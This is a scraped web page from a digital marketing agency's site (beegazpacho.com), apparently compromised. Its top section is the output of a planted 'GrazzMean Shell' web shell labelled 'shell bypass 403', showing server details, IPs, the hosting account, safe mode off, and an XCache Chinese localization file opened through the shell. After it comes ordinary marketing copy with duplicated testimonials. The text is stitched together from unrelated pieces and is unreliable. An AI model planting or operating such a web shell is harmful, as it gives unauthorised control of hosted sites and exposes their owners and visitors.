404 Not Found


nginx
beegazpacho.com - GrazzMean
shell bypass 403

GrazzMean Shell

Uname: Linux in-mum-web1557.main-hosting.eu 5.14.0-611.42.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Mar 24 05:30:20 EDT 2026 x86_64
Software: LiteSpeed
PHP version: 8.2.30 [ PHP INFO ] PHP os: Linux
Server Ip: 88.222.243.106
Your Ip: 216.73.216.168
User: u848900432 (848900432) | Group: o51372345 (1051372345)
Safe Mode: OFF
Disable Function:
NONE

name : zh-simplified.php
<?php
// auto generated, do not modify
$strings += array(
		"Diagnosis Result"
		=> "诊断结果",
		"Item"
		=> "项目",
		"Level"
		=> "级别",
		"Result"
		=> "结果",
		"Explanation/Suggestion"
		=> "解释/建议",
		"XCache extension"
		=> "XCache extension",
		"Add extension=xcache.so (or xcache.dll) in %s"
		=> "在 %s 增加 extension=xcache.so (或 xcache.dll)",
		"Please put a php.ini in %s and add extension=xcache.so (or xcache.dll) in it"
		=> "请在 %s 里放个 php.ini 并且在文件内写入 extension=xcache.so (或 xcache.dll)",
		"Cannot detect php.ini location"
		=> "无法检测 php.ini 位置",
		"(See above)"
		=> "(参见上面)",
		"Not loaded"
		=> "未载入",
		"error"
		=> "错误",
		"Loaded"
		=> "已载入",
		"info"
		=> "信息",
		"Enabling PHP Cacher"
		=> "启用 PHP 缓存器",
		"skipped"
		=> "跳过",
		"Not enabled"
		=> "尚未启用",
		"Your PHP pages is not accelerated by XCache. Set xcache.size to non-zero, set xcache.cacher = On"
		=> "XCache 并未对您的 PHP 网页起到加速作用. 设置 xcache.size 为非 0, 设置 xcache.cacher = On",
		"No php script cached"
		=> "未缓存任何 PHP 脚本",
		"Your PHP pages is not accelerated by XCache. Set xcache.cacher = On"
		=> "XCache 并未对您的 PHP 网页起到加速作用. 设置 xcache.cacher = On",
		"Enabled"
		=> "已启用",
		"PHP Compile Time Error"
		=> "PHP 编译时错误",
		"warning"
		=> "警告",
		"Error happened when compiling one or some of your PHP code"
		=> "至少在编译一个或多个您的 PHP 代码时发生编译错误",
		"PHP code failed to be compiled cannot be cached. This usually means there was syntax error in your PHP code. Enable PHP error_log to see what parser error is it, fix your code. This warning won't go away until PHP is restarted"
		=> "编译失败的 PHP 代码是无法缓存的. 这通常意味着您的 PHP 代码有语法错误. 请启用 error_log 调查具体错误原因并修复您的代码. 重启 PHP 前这个警告不会消失",
		"No error happened"
		=> "未发生过错误",
		"Busy Compiling"
		=> "忙着编译",
		"Cache marked as busy for compiling"
		=> "编译中, 缓存标记为忙",
		"It's ok if this status don't stay for long. Otherwise, it could be a sign of PHP crash/coredump, report to XCache devs"
		=> "这个状态如果持续不就则无影响. 否则可能标志着 PHP 曾经发生异常退出, 如果是的话请报告给 XCache 开发组",
		"Idle"
		=> "空闲",
		"Enabling VAR Cacher"
		=> "启用 VAR 缓存器",
		"PHP code that use XCache caching backend have to use other caching backend instead. Set xcache.var_size to non-zero if you have any PHP code that can use XCache Data Caching API"
		=> "支持使用 XCache 作为数据缓存器的 PHP 代码将不得不采用其他缓存器代替. 如果您有代码支持 XCache 缓存 API 的话, 您可以设置 xcache.var_size 为非 0",
		"Using VAR Cacher"
		=> "使用 VAR 缓存器",
		"No variable data cached"
		=> "未缓存任何变量数据",
		"Var Cacher won't work simply by enabling it. PHP code must call XCache APIs like xcache_set() to use it as cache backend. 3rd party web apps may come with XCache support, config it to use XCache as caching backend"
		=> "只启用变量数据缓存器并无法将其利用起来. 必须通过 PHP 代码去调用 XCache API 接口(如 xcache_set() 函数) 将 XCache 作为缓存器. 第三方网页软件可能带有 XCache 支持, 留意其中的设置启用 XCache 作为缓存器",
		"Cache in use"
		=> "缓存使用中",
		"Cache Size"
		=> "缓存大小",
		"Out of memory happened when trying to write to cache"
		=> "存入缓存时发生内存不足",
		"Increase xcache.size and/or xcache.var_size"
		=> "加大 xcache.size 或 xcache.var_size",
		"Enough"
		=> "充足",
		"Hash Slots"
		=> "哈希槽",
		"Slots value too big"
		=> "哈希槽设定太大",
		"A very small value is set to %s value and leave %s value is too big.\nDecrease %s if small cache is really what you want"
		=> "设置给 %s 的值很小, 却采用过大的 %s. 如果您的确想要配置占用很少内存的缓存器, 可减少 %s",
		"Slots value too small"
		=> "哈希槽设定太小",
		"So many item are cached. Increase %s to a more proper value"
		=> "相当多的项目缓存了. 请适量加大 %s",
		"Looks good"
		=> "看起来还行",
		"Cache Status"
		=> "缓存状态",
		"At least one of the caches is disabled. "
		=> "至少一个缓存器是禁止状态",
		"Enable the cache."
		=> "启用已禁止的缓存器.",
		"It was disabled by PHP crash/coredump handler or you disabled it manually."
		=> "可能是在 PHP 异常退出时自动标记为禁止了, 或者您手工禁止了",
		"You disabled it manually."
		=> "您手工禁止了",
		"If it was caused by PHP crash/coredump, report to XCache devs"
		=> "如果是由于 PHP 异常退出造成, 请报告给 XCache 开发组",
		"Coredump Directory"
		=> "Coredump 目录",
		"Enable coredump to save debugging information in case when PHP crash. It can also be enabled in other module like php-fpm beside XCache"
		=> "启用 coredump 设置. 这样万一发生 PHP 异常退出时可保存调试信息. 这个功能也可以在其他地方启用, 如 php-fpm",
		"Core files found:\n"
		=> "发现 core 文件:\n",
		"Disable XCache PHP Cacher (set xcache.size=0), remove the core file(s), then restart PHP. If core file appears again, report call stack backtrace in the core to XCache devs"
		=> "禁止 XCache 缓存器 (设置 xcache.size=0), 删除 Core 文件, 再重启 PHP. 如果不用 XCache 时不出现 Core, 请从 Core 中取得 call stack back trace 信息报告回 XCache 开发组",
		"You can see core files if PHP crash in %s if PHP crash"
		=> "如果 PHP 异常退出, 您可以在 %s 目录看到 Core 文件",
		"Readonly Protection"
		=> "只读保护",
		"Set to enabled but not available"
		=> "设置为启用, 但目前不可用",
		"Use xcache.mmap_path other than /dev/zero"
		=> "设置 xcache.mmap_path 使用 /dev/zero 以外的值",
		"Disabled"
		=> "已禁止",
		"Enable readonly_protection == --performance & ++stability. Disable readonly_protection == ++performance & --stability"
		=> "启用 readonly_protection == --性能 & ++稳定性. 禁用 readonly_protection == ++性能 & --稳定性",
		"XCache modules"
		=> "XCache 模块",
		"Acceptable. Module(s) listed are built into XCache but not for production server.\nLeave it as is if you're feeling good.\nRe-configure XCache with the module(s) disabled if you're strict with server security."
		=> "可接受. 以上列出的模块已编译入 XCache, 但这些模块并非用于产业服务器.\n如果您觉得没大碍, 就保持现状.\n如果您对稳定性/安全性要求极其严格, 建议重新编译 XCache 不启用这些模块\n",
		"XCache test setting"
		=> "XCache 测试设置",
		"xcache.test is for testing only, not for server. set it to off"
		=> "xcache.test 仅用于开发测试用, 不用于服务器. 将它设置为 off",
		"PHP Version"
		=> "PHP 版本",
		"The version of PHP you're using is known to be unstable: "
		=> "您所使用的 PHP 版本, 是众所周知的不稳定版本: ",
		"Upgrade to new version of PHP"
		=> "升级到更新的 PHP 版本",
		"Extension Compatibility"
		=> "Extension 兼容性",
		"Zend Optimizer loaded"
		=> "Zend Optimizer 载入了",
		"Optimizer feature of 'Zend Optimizer' is disabled by XCache due to compatibility reason; the Loader of it is still available, encoded files are still supported"
		=> "由于兼容性问题, 'Zend Optimizer' 的优化器已被 XCache 禁止; 其加载器依然可用, 可继续使用 Zend 加密的文件",
		"SAPI Compatibility"
		=> "Extension 兼容性",
		"CGI is not supported"
		=> "不支持 CGI",
		"Use FastCGI or FPM instead"
		=> "请改用 FastCGI 或者 FPM",
		"PHP_FCGI_CHILDREN should be >= 1 and use 1 group of parent/childs model. See http://xcache.lighttpd.net/wiki/Faq"
		=> "PHP_FCGI_CHILDREN 应该设为 >= 1 并且使用 1 组单父多子模型. 参见 http://xcache.lighttpd.net/wiki/Faq",
		);

© 2026 GrazzMean
Beegazpacho


Let’s  Start  Your  Online  Journey  with  Beegazpacho 

Welcome to Beegazpacho,
where creativity meets strategy,
and innovation drives success.


Contact
Now


OUR CLIENTS

WhatsApp-Image-2021-12-06.png
Untitled-design-11.png
niaf-logo.png
20220406-163308-scaled.jpg
karchi-logo.png
20220405-171252.png
20220405-171309.png
20220321-161603.png
20220321-161611.png
20220321-161628.png
20220321-161244.png
20220321-161256.png
20220321-161450.png
20220321-161205.png
20220226-170222.png
20220321-161051.png
20211202-170852.png
Untitled-design-9
pidilite-png-logo-colour
logo-black-e1706125740216-qisosldqhzgcaerhdt6n4t3m4s50jr0iik48z0h5vk
Fraikin-Dayim-logo-1
hpcl-logo-2-1
services

Transforming Ideas into
Success

.01
Digital Marketing

We drive growth through data-driven strategies and cutting-edge techniques.

Learn More

.02
SEO

Improve your online visibility and rank higher on search engines with our expert SEO services.

Learn More

.03
Website Designing

We design websites that are not only visually stunning but also user-centric, ensuring seamless navigation and enhanced user experience.

Learn More

.04
App Development

Our apps are crafted to be intuitive, engaging, and functional, providing your users with an exceptional mobile experience.

Learn More

.05
Social Media Ads

Target the right audience with precision and creativity to maximize engagement and conversions.

Learn More

.06
Google Ads

Maximize ROI with precision-targeted campaigns on Google’s powerful ad platform.

Learn More

.07
Google My Business

Optimize your local presence with strategies that put your business on the map and attract more customers.

Learn More

.08
Graphic Designing

Our designs tell your brand’s story in a visually compelling way.

Learn More

.09
3D Videos

Bring your product to life with immersive and dynamic 3D explainer videos.

Learn More

about BEEGAZPACHO

creating special Things
For special brands

Join the ranks of successful brands by partnering with Beegazpacho

00+

Happy Customer

00+

Continents

Our vision is not just to be a service provider but to be your partner in growth. We see ourselves as an extension of your team, working tirelessly to ensure that your brand not only meets its goals but surpasses them.

Explore
more

Our Recent Work

Crafted with Passion and Precision

Connect now


Web Design
Design, Development & Identity

Logo Design
Design, Development & Identity

Creative Brand design
Design, Development & Identity

Product Design Marketing
Design, Development & Identity

DIGITAL MARKETING
SEO
WEBSITE DESIGNING
APP DEVELOPMENT
SOCIAL MEDIA ADS
GOOGLE ADS
GOOGLE MY BUSINESS
GRAPHIC DESINING
3D VIDEOS
Client Stories

Hear It from Those Who Know Us Best

Our clients’ success stories speak volumes about our commitment to excellence. Don’t just take our word for it—hear directly from the brands we’ve partnered with. Their testimonials highlight our ability to bring visions to life and create a lasting impact on their businesses.

“Beegazpacho feels like an extension of our team. Their content marketing and social media expertise have elevated our brand. They listen, adapt, and always deliver on time. We look forward to continuing this partnership.”

— Sarah Williams

Head of Marketing, GreenPlanet Apparel

“Beegazpacho’s data-driven strategies helped us improve our online ads, optimize our website, and enhance branding. We’ve seen great ROI and increased visibility. Their professionalism is unmatched.”

— Arvind Shah

CEO, InnovateTech Solutions

“Partnering with Beegazpacho has been a game-changer for our brand. Their creative ad campaigns and SEO services have boosted our online presence and significantly increased leads and sales. We couldn’t ask for a better partner!”

— Rina Kapoor

Marketing Director, Luxury Home Interiors

“Beegazpacho feels like an extension of our team. Their content marketing and social media expertise have elevated our brand. They listen, adapt, and always deliver on time. We look forward to continuing this partnership.”

— Sarah Williams

Head of Marketing, GreenPlanet Apparel

“Beegazpacho’s data-driven strategies helped us improve our online ads, optimize our website, and enhance branding. We’ve seen great ROI and increased visibility. Their professionalism is unmatched.”

— Arvind Shah

CEO, InnovateTech Solutions

“Partnering with Beegazpacho has been a game-changer for our brand. Their creative ad campaigns and SEO services have boosted our online presence and significantly increased leads and sales. We couldn’t ask for a better partner!”

— Rina Kapoor

Marketing Director, Luxury Home Interiors